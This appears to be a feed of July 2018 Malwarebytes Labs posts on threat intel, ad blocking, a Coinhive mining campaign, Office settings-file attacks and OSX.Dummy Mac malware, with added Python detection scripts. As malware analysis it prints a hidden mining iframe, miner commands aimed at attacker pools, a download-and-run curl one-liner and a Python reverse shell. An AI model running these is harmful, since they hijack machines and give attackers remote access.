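            verdicts[src] = "password-spray"    # one guess across many accounts
        elif s.attempts >= brute_attempts:
            verdicts[src] = "brute-force"       # many guesses against one account
        else:
            verdicts[src] = "noise"
    return verdicts


def triage(log_text):
    return classify(aggregate_by_source(parse_events(log_text)))


if __name__ == "__main__":
    for src, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(f"{src:16} {verdict}")
```

The interesting verdict is `credential-reuse`: a source submitting passwords that were valid on your systems at some point is not guessing, it is working from a list, and the account set it hits tells you which leak (or which old export) it came from.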

Where to go next

Threat intelligence is a relatively new field in private sector infosec, but a few researchers have produced valuable resources for getting people on the right path.

Securosis provides both a threat intel blog, and a library of papers offering deep dives into security principles and best practices.

The SANS reading room has a great white paper on identifying what threat intel is, and what it can do in best cases.  Very useful in communicating with executives who might be unclear on these ideas.

And if you’ve already started a threat intel program, check out the SANS paper on evaluating information security controls.  The scope is a bit broader than a single cyber security function, but should provide valuable input on how to judge if your program is working for you at a reasonable cost.

Threat intelligence is still a very new idea that doesn’t yet have widely agreed upon best practice.  So while there are some good resources to get started, the best resource for you is most likely other people in the same position.  Talking to peers, reading current blogs, and keeping tabs on productive teams can position you well for success.  Good luck, and stay safe.

The post So you’ve been asked to start a threat intel program appeared first on Malwarebytes Labs.


A week in security (July 2 – July 8)

Malware Bytes Security - Mon, 07/09/2018 - 1:00pm

Last week, we tracked back a large mining operation from their Coinhive shortlink, we took a look at online project management tools, we described a new macro-less technique to distribute malware, and talked about a Mac malware that targets crypto-mining users.

Other news:
  • Huawei enterprise comms kit has a TLS crypto bug. (Source: The Register)
  • The Pentagon is building a dream team of tech-savvy soldiers. (Source: Wired)
  • Some computer science academics ran an experiment to find out whether your phone is secretly listening to you. (Source: Gizmodo)
  • Chrome and Firefox pull stylish add-on after a report it logged browser history. (Source: Bleeping Computer)
  • A downloader that decides how to infect the victim: with a cryptor or with a miner. (Source: SecureList)
  • Macro-based malware campaign replaces desktop and Quick Launch shortcuts to install backdoor. (Source: SCMagazine)
  • Homeland Security subpoenas Twitter for data breach finder’s account. (Source: ZDNet)
  • Ex-NSO employee caught selling stolen phone hacking tool for $50 Million. (Source: The Hacker News)
  • A handful of giant companies are centralizing control of the internet. (Source: BuzzFeed News)
  • Eight arrested in Africa-based cybercrime and business email compromise conspiracy. (Source:

Stay safe, everyone!

The post A week in security (July 2 – July 8) appeared first on Malwarebytes Labs.


Everybody and their mother is blocking ads, so why aren’t you?

Malware Bytes Security - Mon, 07/09/2018 - 11:00am

This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.

If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.

We’ll then follow up in Part 2 of this series by discussing common tools and configurations to help get the most out of your browsing experience.

You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.

Don’t be fooled. Ad blocking provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information. Not only that, but blocking online ads and trackers has the added benefit of conserving bandwidth and battery life, boosting website response times, and generally improving the overall user experience. So using an ad blocker not only protects your device, but also provides a better overall user experience. What’s not to love?

It’s all a bunch of hullabaloo!

Advertisers, publishers, and website owners despise talk of blocking the pesky advertisements that appear on their webpages—especially the ads that more aggressively vie for attention (and thus pay the website owners’ bills). We’ve all seen them. We’re talking about the ads that auto-play commercials or news clips as soon as the page is loaded. Bright, flashy popups, and page overlays that have to be clicked before seeing the desired content. Even the sponsored results that appear in search listings.  They are everywhere!

Hundreds of billions of ad impressions occur each month, and digital ad revenue for online advertising is estimated to top $237 billion in 2018. With so many impressions to be served, it’s no wonder that website operators are clearing space and making way for advertisers to clutter the website landscape.

Search listing shown inside Google

And we get that ad impressions are the lifeblood of many website operators and publishers who rely on clicks as the primary mechanism to create revenue. Some may even argue that ‘clicks create jobs’.

But let’s face it. In most cases, ads suck! Advertisers like to push the notion of “acceptable ads,” “non-intrusive advertising,” and “reasonable number of impressions,” but this is rhetoric designed to sway the opinion of an impressionable society—and it’s all a bunch of poppycock if you ask me.

Most people don’t like advertisements. They never have. That’s why VCRs became popular back in the ’80s. The devices allowed users to set up recordings and then skip commercials at their convenience later. It’s why DVRs became mainstream years ago, and why people flock to streaming services like Netflix now. It’s even the reason why people skip the first few minutes of a movie.

Ads diminish the overall user experience by forcing the attention of the consumer elsewhere, and creating a delay or nuisance in the ability to ingest the preferred content. A website’s “sponsored” listings often consume much more of the page landscape than actual content, which causes more time to be spent searching for desired items. This can lead to consumers paying more than would have been paid with a non-sponsored competitor. And then there are the ads that are purposefully obnoxious or play recurring sounds in a small box in the corner of the window. These are all just terrible to endure.

If it were a matter of simply not enjoying the content, then this point would be debatable. But, online advertisements pose a threat and provide an infection vector for malicious actors to launch targeted malware attacks. This can turn even the most reputable websites into potential delivery systems for malware authors.

Malware can be delivered inside that ad

Ad platforms allow for fun, flashy ads that can play games and pose quizzes, but at the same time this functionality poses great risk to consumers.

Malvertising has the ability to affect even the most careful of users due to the nature of how advertisements are designed to automatically run code when they are loaded. Attackers may (and do) attach craftily hidden exploit code to otherwise innocuous-looking ads for well-known products and then submit these ads for publication to known and reputable websites.

Don’t be fooled by this Best Buy ad. It’s not real!

While many of the large ad networks perform due diligence and scan for such malicious content prior to publication, there are dozens, if not hundreds of ad networks to which a criminal can submit their malicious code. And not all of those companies possess the same standards as their multi-billion dollar counterparts. Taking into account the speed and nature of the real-time bidding process for online ads (a fascinating process that deserves a post unto its own) it’s not surprising that bad ads can get past even the most well-intentioned ad networks.

$5.00 and 10 minutes is all it takes with this ad network.

Consider for a moment this blog post released by Google earlier this year, which sheds some light on the number of malicious ads that were blocked through the ad ecosystem. In the post, Google stipulates that 3.2 billion ads were removed in 2017 for violating advertising policies. That translates to 100 advertisements for every single second, of every day, for the entire year! Of these ads, 79 million were pushing malware-laden websites. And that’s in addition to the more than 320,000 publishers that were blacklisted, and over 1 million websites and apps that were removed or blocked.

That’s a lot of bad ads!

Setting aside Google’s ability to block malicious content as it appears on their network, some may contend that with so much bad stuff out there, some things are bound to slip through the cracks every once in a while.

And, lest we forget, there are a plethora of other website, news, and advertising companies without the means or desire to police the content. Malicious actors can launch highly-targeted campaigns, which may be visible to no more than a small handful of people, and which can often fly under the radar of security mechanisms and systems. Who out there wants to be the guinea pig and offer up their computer to the attackers when such lapses occur?

Don’t track me, bro

We’re all familiar with the Cambridge Analytica scandal involving the collection of approximately 87 million Facebook records. The highly-publicized event has led to insolvency proceedings against the company (though Cambridge Analytica may have been recently resurrected under the name Data Propria). People were outraged in part because the company had covertly collected and stored information on large swaths of the population without their consent. But what those same people may not understand is that Cambridge Analytica is not alone in this practice.

There are numerous organizations ranging from small one and two person operations, all the way up to mega-million dollar corporations that are involved in the process of collecting and selling consumer data. Data brokers, data warehouses, and data exchange platforms all provide tools and services to not only collect information, but also sort and organize the information in a manner that allows advertisers to target specific groups of users.

Online data broker offering “data that is only seconds old”

Few of these organizations have the express consent from users to harvest and store their information, and many lack even the most basic of security protocols to protect and maintain the information after it’s collected.

Consider the recent database exposure surrounding data broker Exactis.  The company has recently been accused of having a poorly secured server, which compromised nearly 340 million individual records containing everything from addresses, telephone numbers, and email addresses, to more than 400 different data points for habits, interests, and hobbies. All sorts of other personal details are tracked, harvested, and stored in these databases; everything from age all the way down to a person’s clothing size and shopping history. Do you smoke, drink, or enjoy gambling? That’s in there, too.

Exactis has over 3.5 billion records, with information on most of us

And who exactly is Exactis? The company claims to be a leading compiler and aggregator of business and consumer data. The information collected by the company is used for customer profiling and to assist marketers in identifying descriptive traits and customer segments to help better understand behavior. This information can then be used to direct targeted advertising to specific groups.

The company website claims to possess 3.5 billion records on 218 million individuals and 110 million households. When asked where the information originated, Night Lion Security founder Vinny Troia was quoted as saying, “It seems like this is a database with pretty much every US citizen in it. I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While we may not know for certain, it’s probably a safe assumption that at least some of those records are obtained through the use of online trackers, and services that run silently in the background, tracking and logging your behavior each time you browse online.

Why do we continue to tolerate this sort of illicit data collection? Don’t be like Steve Huffman, the Reddit CEO who allowed himself to be targeted by a Facebook advertisement for the purpose of an employment solicitation.  Instead, use an ad blocker, which not only blocks the targeted trackers that are compromising your personal information and divulging your secrets to the highest bidder, but will also prevent the targeted ad from being shown, thus, reducing your exposure to infection and solicitation.

No, it’s not morally unconscionable to use an ad blocker

Despite the notices, pleas from website owners, and the position from advertisers and publishers that ad-blocking will destroy the internet as we know it, there are no laws against using an ad blocker to prevent objectionable content from appearing on any device that you own or use.

In a long-followed case that transcended all the way to the German Supreme Court, European publisher Axel Springer was defeated in a years-long battle against Adblock Plus publisher Eyeo, after failing to persuade the court that the ad blocker violated competition law and was engaging in legally-dubious business policies. (Eyeo’s business model allowed for unblocking ads deemed “acceptable,” as well as those of advertisers who paid for such distinction.)

The court ruling puts an end to Springer’s quest of having ad blocking deemed illegal. The ruling also vindicates users’ continued use of blocking software to prevent unwanted or objectionable content from being shown.

Americans are likely to have equally strong, if not stronger, ad blocking protections than our German friends.

A search through the dockets and filings involving Eyeo, the parent company of Adblock Plus, turns up not a single case in which the company has been required to defend its practice of blocking advertisements. And really, it’s almost a bit of a stretch to envision an American jury being persuaded by the argument that advertisers have the right to display content, but consumers don’t possess the right to block said content when they don’t approve.

Therefore, with no laws preventing the use of an ad blocker, and with the counterargument simply reduced to the corporate mantra of “maximizing profits,” consumers are free to choose the security policy that best fits their needs.

Convinced yet?

We’ve seen that ads not only diminish the user experience of ingesting content, but that they also pose a substantial risk to consumers.

The potential for malvertising to successfully deploy a nasty payload to your machine, which may compromise your system and jeopardize your financial security, is real. Worse yet, these types of attacks don’t even require user interaction and can execute merely by visiting the page.

And if the threat of financial ruin is of no concern, then the privacy-invading act of data harvesting should be.

The array of data collectors and data brokers out there is mind boggling, and they are all struggling to associate your actions and behaviors to groups and other individuals for no other purpose than to create targeted ads and increase profits. The information collected by these organizations may be poorly secured and is a potential gold mine for any cybercriminal.

And if the moral conviction of blocking the advertisements of your favorite websites has thus far prevented the adoption of ad-blocking technology, then the knowledge of an ever-growing advertising ecosystem and the lack of laws preventing ad-blocking mechanisms should ease those concerns. Yes, we all want to generate revenue for our brand, but personally I’d rather not help do that at the cost of potential identity theft, or worse, having my PC compromised by a malware attack originating from a rogue advertisement on a popular website.

Coming up 

In Part 2 of this series, we’re going to have a look at some of the common ad-blocking utilities and how to configure those tools to fit the needs of the individual user. We’ll show how to navigate user-friendly settings that are simple enough to use on Grandma’s computer. We’ll also take a deep dive into some more advanced configurations and tools that may require a shift in user mind-set, usage, and understanding before fully realizing the benefits such configurations provide.

We’ll cover blocking ads on both mobile and PC devices, as well as configuring a network solution to block ads throughout your entire environment.

So stay tuned to the Malwarebytes blog, or follow this post and we’ll update it with links once available.

The post Everybody and their mother is blocking ads, so why aren’t you? appeared first on Malwarebytes Labs.


Can we trust our online project management tools?

Malware Bytes Security - Fri, 07/06/2018 - 11:00am

How would you feel about sharing confidential information about your company on Twitter or Facebook? That doesn’t sound right, does it? So, in a corporate life where we keep our work calendars online, and where we work together on projects using online flow-planners and online project management software, it might pay off to wonder whether the shared content is safe from prying eyes.

What are we looking at?

From the easy-to-use shared document on Google Drive to full-fledged Trello boards that we use to manage complicated projects—basically everything that uses the cloud as a server is our subject here. When evaluating your online project management tools, it is important from a security standpoint to have an overview of:

  • Which online project management platforms are you using?
  • Which data are you sharing on which platforms?
  • Who has access to those data?

Once you know this, you can move on to the main question:

  • Is the data that should stay confidential shielded well enough?

What are the risks?

The risks of using online project management tools are made up of several elements. Once again, a list of questions will help you gauge this, including:

  • How secure is the platform you are using?
  • Do the people that have access to the data need to have access? And are they given access to see all the information that is shared, or just a portion?

As you can see, we are not just worrying about outsiders getting ahold of information. Sometimes, we must keep secrets, even from our own co-workers. Not every company has an open salary policy, for example, so information about how much everyone makes might not be allowed outside of HR.

But the threat of a breach is the most important one. Having the competition know about the latest project your design team is working on can be deadly in some industries. And of course, any project that contains customer data and is not secured can be breached by a cybercriminal. Knowing this, it’s our job to help you find the safest possible tool to perform your job.

Does it make sense to share online?

Are we sharing information online because we need to do it online or just because we can? Sometimes being the cool kids that use an online project management platform that has all the bells and whistles is more a matter of convenience than it is strictly necessary. But if you are:

  • employing remote workers
  • cooperating between offices around the world
  • heavily relying on a BYOD strategy

then online tools may be the only way to realize your project management goals.

Every ounce of prevention

What you don’t share can’t get lost. And control over what you do share (and with whom) is essential.

  • Limit the amount of privileged information you are sharing. Make sure that only the information needed for the project is being shared with the appropriate team members.
  • Change the login credentials at a regular interval, and do this in a non-predictable way. Going from “passwordMay” to “passwordJune” at the end of the month will not stop nosy co-workers from digging. Do not post the new credentials on the platform, either.
  • Use 2FA where and if possible to enhance login security.
  • Update and patch the software as soon as possible. This limits the risk of anyone abusing a published vulnerability in the platform.
  • Keep tally of who is supposed to have access at all times, and check this against the connected devices when and if you can.

Breach management

Hardening your online tools against breaches is usually in the hands of toolmakers themselves—the software provider or the cloud service provider with whom you’ve partnered. Therefore, it makes sense to look into the project management tool’s reputation for security, as well as its ability to serve your company’s needs. While you can’t control the security of the tool itself, you can limit the consequences of a mishap, should it occur, by doing the following:

  • Don’t try to keep it a secret when credentials have been found in the wrong hands. Making participants aware of the situation helps them to change passwords and follow up with other appropriate actions.
  • Make sure there are backups of important data. Someone with unauthorized access may believe in burning the bridges behind them.
  • In case of a breach, try your best to find out exactly how it happened. Was there a vulnerability in the tool? Did a team member open up a malicious attachment? This will assist you in preventing similar attacks.

Controlling the risks

Working in the cloud can be useful for project management, but sometimes we need a reminder that there are risks involved. If you set up an online project management tool or other cloud-based project, it’s good to be aware of these risks and give some thought to the ways you can limit them.

When you’re working on a project for your company—whether it’s leading a team or participating in the project’s development—it’s important to make data losses as rare as possible, to learn from your mistakes, and to handle breaches and other security incidents responsibly.

Stay safe out there!

The post Can we trust our online project management tools? appeared first on Malwarebytes Labs.


Obfuscated Coinhive shortlink reveals larger mining operation

Malware Bytes Security - Tue, 07/03/2018 - 11:00am

During the past several months, in-browser mining has continued to affect a large number of websites, predominantly relying on Coinhive’s infamous API. We documented several campaigns on this blog, in particular Drupalgeddon, where attackers are taking advantage of vulnerabilities in popular Content Management Systems (CMS) to compromise websites and push payloads both client- and server-side.

In the past weeks, our crawlers have catalogued several hundred sites using a variety of CMS all injected with the same obfuscated code that uses Coinhive’s shortlink to perform silent drive-by mining. By pivoting on this indicator of compromise, we were able to identify a larger infrastructure receiving traffic from several thousand hacked sites acting as doorways to redirect traffic to a central server involved in the distribution of both web and standard malware coin miners.

Figure 1: Mining operation fueled by compromised sites

Obfuscated miner injection

As part of our regular crawls, we look for known redirects to sites of interest and lately, most have been related to Coinhive domains. We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.

<iframe src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></iframe>

Figure 2: A WordPress site injected with an obfuscated iframe loading Coinhive’s API

The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.

Figure 3: Shortlink is taxing our CPU at 100% 

In Figure 3, we made the iframe visible by changing its dimensions to show that, rather than waiting for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page. Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.
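The injection described above is a hex-encoded blob that decodes to a 1×1 iframe pointing at the shortlink domain. Here is an added example (not code from the post or from Malwarebytes) that a site owner or crawler can run over page source to surface such injections: it decodes the hex runs, parses any markup they contain, and flags iframes whose host is a Coinhive domain and whose dimensions or style hide them. The three encodings handled (`\x` escapes, percent-encoding, bare hex) are assumptions about how the blob is typically carried; the sample page is constructed here by re-encoding the decoded iframe from the post, and the domain is written undefanged inside the code so the URL parser can match it.

```python
"""Surface hidden Coinhive-shortlink iframes carried inside hex-obfuscated page code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts to flag. cnhv.co is the shortlink domain from the campaign; coinhive.com is
# the API host. Extend this set with your own observations.
MINER_HOSTS = {"cnhv.co", "coinhive.com"}

# Three ways injected markup is commonly hidden (assumption: which one a given
# campaign uses varies, so all three are decoded).
HEX_RUN = re.compile(r"((?:\\x[0-9a-fA-F]{2}){8,})")      # "\x3c\x69\x66..."
PCT_RUN = re.compile(r"((?:%[0-9a-fA-F]{2}){8,})")        # "%3C%69%66..."
RAW_HEX = re.compile(r"\b((?:[0-9a-fA-F]{2}){16,})\b")    # "3c696672616d65..."


def decode_hex_runs(text):
    """Return the decoded text of every obfuscated run found in `text`."""
    out = []
    for m in HEX_RUN.finditer(text):
        out.append(bytes.fromhex(m.group(1).replace("\\x", "")).decode("latin-1"))
    for m in PCT_RUN.finditer(text):
        out.append(bytes.fromhex(m.group(1).replace("%", "")).decode("latin-1"))
    for m in RAW_HEX.finditer(text):
        try:
            s = bytes.fromhex(m.group(1)).decode("ascii")
        except UnicodeDecodeError:
            continue          # long hex that is not text (hashes, binary), skip it
        if "<" in s:
            out.append(s)
    return out


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def iframes_in(html_text):
    p = IframeCollector()
    p.feed(html_text)
    return p.iframes


def is_hidden(attrs):
    """True when the iframe is sized to 1px or less, or styled invisible."""
    def tiny(v):
        try:
            return int(str(v).strip("px")) <= 1
        except ValueError:
            return False
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def find_miner_iframes(page_source):
    """Scan the raw source and every decoded hex run for iframes on miner hosts."""
    hits = []
    for chunk in [page_source] + decode_hex_runs(page_source):
        for attrs in iframes_in(chunk):
            src = attrs.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host in MINER_HOSTS:
                hits.append({"src": src, "hidden": is_hidden(attrs)})
    return hits


# Constructed sample: the decoded iframe from the post, re-obfuscated with \x escapes
# the way an injected document.write() call would carry it. Not a real capture.
INJECT = '<iframe src="https://cnhv.co/3h2b2" width="1" height="1" align="left"></iframe>'
SAMPLE_PAGE = (
    '<html><body><p>Welcome</p><script>document.write("'
    + "".join(f"\\x{b:02x}" for b in INJECT.encode())
    + '")</script></body></html>'
)

if __name__ == "__main__":
    for hit in find_miner_iframes(SAMPLE_PAGE):
        print(hit)
```

Because the decoder runs before the HTML parser, a plain `grep cnhv` over the page source would miss this injection while the scan above does not; the `hidden` flag is what separates a site that deliberately embeds a visible shortlink from one that has been compromised.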

Backdoor initiated redirection

Querying further, we were able to find the same Coinhive key active as early as May 7 via a different redirection mechanism. There is a specific URI pattern indicating that hacked sites are being leveraged to perform a redirect to a server at 5.45.79[.]15. This in turn creates a redirection via another crafted URI where one of the parameters is the referrer site, ultimately leading to the Coinhive shortlink that will start the web miner.

Figure 4: The same shortlink was found loaded from a compromised website via an intermediary server

Several sites have been injected with both the hidden cnhv[.]co iframe method, as well as via backdoors:

Figure 5: A hacked site injected with Coinhive’s shortlink and multiple compromised URLs

The URI pattern used for the redirections can be identified by the following regular expression:

Figure 6: A regular expression showing a match between compromised sites

Blackhat SEO and doorways

Looking at those URIs again, we can note the presence of certain keywords that appear to be Search Engine Optimization (SEO) related, for instance:

cctvvietnam[.]com/1hqg/wzdea.php?lrscye=mongodb-count-fields
[.]uk/9ul8/6nfme.php?lrscye=relativity-software-cost
valam[.]in/f8wb/z8d6w.php?lrscye=tutoring-in-egypt
stemat[.]pl/klwy/dzwfy.php?lrscye=vin-decoder-mercedes
whylab[.]nl/podd/1hwnz.php?lrscye=gpon-home-gateway-exploit
soho-dom[.]ru/el5p/ywuul.php?lrscye=bts-album-download-zip

We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as “doorways,” usually to a traffic distribution system or redirector (5.45.79[.]15). In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for.
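For a site owner who wants to know whether their server is acting as one of these doorways, here is an added example (not the post’s Figure 6 regex, which is not reproduced here) that scans web-server access logs for the URI shape of the doorway requests listed above. The pattern (a four-character directory, a five-character PHP name and the lrscye parameter) is inferred from those URIs and is an assumption; the log lines are constructed.

```python
"""Flag doorway-style requests in an access log (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Assumption: shape derived from the doorway URIs quoted in the post.
DOORWAY_URI = re.compile(r"^/[a-z0-9]{4}/[a-z0-9]{5}\.php$")
DOORWAY_PARAM = "lrscye"
SEARCH_ENGINES = ("google.", "bing.", "yahoo.", "duckduckgo.")

# Constructed sample log: two doorway hits reached from search results,
# plus two ordinary requests that must not be flagged.
LOG_SAMPLE = """\
203.0.113.7 - - [05/Jun/2018:10:14:02 +0000] "GET /1hqg/wzdea.php?lrscye=mongodb-count-fields HTTP/1.1" 302 0 "https://www.google.com/" "Mozilla/5.0"
198.51.100.23 - - [05/Jun/2018:10:14:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jun/2018:10:15:44 +0000] "GET /f8wb/z8d6w.php?lrscye=tutoring-in-egypt HTTP/1.1" 302 0 "https://www.bing.com/search?q=tutoring+in+egypt" "Mozilla/5.0"
198.51.100.5 - - [05/Jun/2018:10:16:00 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format log line into its fields, or None."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def doorway_hit(entry):
    """Return a finding when the request matches the doorway URI pattern."""
    parts = urlsplit(entry["path"])
    if not DOORWAY_URI.match(parts.path):
        return None
    keyword = parse_qs(parts.query).get(DOORWAY_PARAM, [None])[0]
    if keyword is None:
        return None
    ref_host = urlsplit(entry["referer"]).netloc.lower()
    return {
        "ip": entry["ip"],
        "path": parts.path,
        "keyword": keyword,                      # the SEO term being served
        "from_search_engine": any(s in ref_host for s in SEARCH_ENGINES),
        "redirected": entry["status"].startswith("30"),   # doorway bounced the visitor
    }


def scan_log(text):
    """Run every line of an access log through the doorway check."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry:
            hit = doorway_hit(entry)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_SAMPLE):
        print(hit)
```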

Figure 7: Despite appearances, this file is not 100 percent clean

Note how the server at 5.45.79[.]15 is performing the redirection to another hacked sited (motoir[.]com), where the keywords passed from the URI are dynamically used to create what looks like a unique download page and file.

Figure 8: Web traffic showing the redirection sequence

Malicious coin miners

Upon execution, this executable will unpack the following three binaries:

  1. winsystem.exe: the XMRig miner
  2. clock.exe: a .bat file wrapped into an EXE that contains the commands
  3. netflash.exe: a very simple downloader, written in .NET.

The batch script adds persistence by setting a registry entry, kills certain processes (possible miners already running), and starts mining by launching:

winsystem.exe -B -a cryptonight -o 37.1.197[.]121:80 -p x -u %COMPUTERNAME% +500 --max-cpu-usage=30 --donate-level=1 -k

Figure 9: Batch script revealing the mining code

The fake download binaries are based on the same code from a miner, unsurprisingly, hosted at 5.45.79[.]15/xxxphoto.exe. Using VirusTotal Intelligence, we were able to expand on this infrastructure and identify another coin miner, which is an ELF file this time, based on this cnrig library, hosted at: 5.45.79[.]15/monero/cnrig.

Figure 10: Graph showing an ELF and Win32 miner hosted on the same server

A comment left on this VirusTotal report page indicates that this miner was found on an infected server and pulled down from a PHP backdoor called zz1.php. Searching for that file name, we located a possible candidate uploaded to a public site. Decoding the Base64 encoded strings, we can assert with greater confidence that this is the malicious PHP file used by the attackers to download the Linux coin miner from 5.45.79[.]15/monero/cnrig:

Figure 11: PHP code uploaded into compromised sites responsible for ELF miner download

Once it has retrieved the ELF binary, it runs it, using the following command in order to begin mining:

./cnrig -o 5.61.46[.]146:80 --donate-level=1 > /dev/null 2>&1

Proxies

Because the miners are connecting to private pools (and likely via proxy) without using a wallet address, we cannot assess how much money the perpetrators have generated with this scheme.

In fact, the server at 5.45.79[.]15 also has its own ProxyPanel:

Figure 12: A proxy based on xmrig-proxy

The XMRig version of the miner had a public stats page indicating that there were close to 500 infected machines that had participated in the mining activity. For the CNRig version, we weren’t able to find any such stat, although the number of hacked servers was much higher.

A growing number of sites

The interest surrounding cryptocurrencies has drastically changed the malware landscape with criminals hoping to get a piece of the action. As such, a growing number of websites are being compromised both client- and server-side to distribute and run coin miners.

In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online. In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners. Finally, it seems only fitting to see an abuse of Coinhive’s shortlinks to perform in-browser mining.

Malwarebytes blocks malicious mining, whether it is triggered by malware or loaded via compromised websites.

Thanks to @DynamicAnalysis for sharing additional information.

Indicators of compromise

String for obfuscated cnhv[.]co injection


Coinhive shortlink


Coinhive site key


Regex for compromised sites redirection


Redirection server


Windows miner dropper

5.45.79[.]15/xxxphoto.exe 38f55239519523638dc2b3958f5e9951a6b04f813336927a4f7de717518e5b44

Linux miner

5.45.79[.]15/monero/cnrig c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031

The post Obfuscated Coinhive shortlink reveals larger mining operation appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New macro-less technique to distribute malware

Malware Bytes Security - Mon, 07/02/2018 - 5:12pm

One of the most common and effective infection vectors, especially for businesses, is the use of malicious Office documents. This year alone, we witnessed two zero-days for both Flash and the VBScript engine, which were first actually embedded into Office documents before gaining wider adoption in web exploit kits.

In addition to leveraging software vulnerabilities, attackers are regularly abusing normal Office features, such as macros, or more obscure ones like Dynamic Data Exchange (DDE), and of course Object Linking and Embedding (OLE) attacks, which can also be mixed with exploits. System administrators can harden endpoints by disabling certain features company-wide, for example to foil certain social engineering schemes that try to trick users to enable a malicious macro. In recent versions of Office, Microsoft is also blocking the activation of objects considered high risk, based on a list of extensions that can be customized via Group Policy.

But a recent discovery by security researcher Matt Nelson, shows that yet another infection vector can be tapped into, one that circumvents the current protection settings and even Microsoft’s new Attack Surface Reduction technology. By embedding a specially-crafted settings file into an Office document, an attacker can trick a user to run malicious code without any further warning or notification.

The file format, specific to Windows 10, is essentially XML code that is used to create shortcuts to the Control Panel. This feature can be abused because one of its elements (DeepLink) allows any binary with parameters to be executed. All an attacker needs to do is add their own command using Powershell.exe or Cmd.exe. And the rest is history.

A new script found by Nick Carr shows an attack where PowerShell is invoked to download and execute a Trojan (VT report). According to Matt Nelson, who discovered this new technique, Microsoft is not going to fix it, at least for the time being.

We tested this sample in our lab and are happy to report that Malwarebytes users are already protected:

During the past few years, while there has been little development with web exploit kits, there has been a lot of activity with document exploit kits such as Microsoft Word Intruder (MWI) or Threadkit. These toolkits allow attackers to craft lures and embed the exploit(s) of their choice before either spear phishing their victims or sending the file via larger spam campaigns. At the same time, it looks like classic social engineering attacks aren’t going anywhere anytime soon and will keep capitalizing on the human element.

It is important for end users and businesses to recognize that malicious documents represent a very real threat and require adequate protection and training to defend against.

The post New macro-less technique to distribute malware appeared first on Malwarebytes Labs.


Mac malware targets cryptomining users

Malware Bytes Security - Mon, 07/02/2018 - 2:36pm

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

This script downloads an executable file named script from a malicious site, gives it executable permissions, then launches it. This script is a ridiculous 34 megabytes in size, and seems to do no more than create a shell script file and a launch daemon to keep it running.

The shell script itself uses Python to open a reverse shell to port 1337 on a malicious server, giving the hacker behind the malware continued access to the computer.

#!/bin/bash
while :
do
    python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
    sleep 5
done

All in all, this malware is not particularly exceptional, and it lives up to the name OSX.Dummy in multiple ways. However, there are a few interesting things to note about this malware.

Risks posed by posted scripts

The method of distribution is interesting. People on forums and other online sources have been giving instructions that involve running commands at the command line—in the Terminal on a Mac—for many years, and still do today.

As an example, one user on Apple’s forums used to give users a highly obfuscated shell command consisting of tens of thousands of characters, with instructions to copy and paste it into the Terminal to run it. This script was run by users of the forums, and the output of the script posted there—thousands of times.

